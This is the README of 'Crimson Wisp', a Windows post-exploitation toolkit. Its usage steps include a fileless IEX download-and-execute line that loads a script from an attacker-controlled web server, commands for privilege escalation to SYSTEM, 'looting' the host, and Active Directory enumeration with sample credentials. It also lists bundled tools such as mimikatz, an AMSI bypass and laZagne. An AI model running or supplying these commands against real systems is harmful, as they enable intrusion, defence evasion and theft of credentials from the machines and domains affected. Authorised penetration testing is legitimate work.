Crimson Wisp is a tool that automates post-exploitation
PRIVILEGE ESCALATION&LOOTINGphases. It uses many open source tools. Most of them are available for download from GitHub.
git clone https://github.com/Karmaz95/crimson_wisp.git
chmod +x update.sh
./update.sh
- GO TO crimson_wisp DIRECTORY AND START THE WEB SERVER
cd crimson_wisp
sudo python3 -m http.server 80
- LOAD THE SCRIPT TO MEMMORY
IEX(new-object system.net.webclient).downloadstring("http://<your_server>/wisp.txt")
- SET A SERVER URL FOR THE DOWNLOADERS & LOAD THE SCRIPTS
Invoke-Wisp -Url http://<your_server>
. memory_load
- PRIVILEGE ESCALATION ENUMERATION
. escalation
- LOOTING THE SYSTEM - USE AS nt
authority/systemONLY!
. looting
- LOCAL ADMIN TO SYSTEM
. get_system
- AD ENUM - AS THE CURRENT USER
. ad_enumerator -domain domain.com -asme
- AD ENUM - AS THE DIFFERENT USER
. ad_enumerator -domain domain.com -user 'DOMAIN\karmaz95' -pass 'enumeration10!'
If you are curious about how it works, read my blog:
The following tools are used in
Crimson Wisp. I encourage you to study the links below. They will help you in your work.
- winPEAS
- AMSI BYPASS
- HostRecon
- PrivescCheck
- PowerUp
- PowerView
- SharpHound
- adPEAS
- LAPSToolkit
- PowerUpSQL
- Invoke-Portscan
- mimikatz
- psexec
- procdump
- nmap
- Rubeus
- laZagne
- Inveigh
- PowerSharpPack
This program is free software: you can redistribute it and/or modify it under the terms of the Apache License. Crimson Lisp and any contributions are Copyright © by Karol Mazurek 2022.
You can support the project by buying me a coffee or via NFT which unlock the secret Crimson Web community.
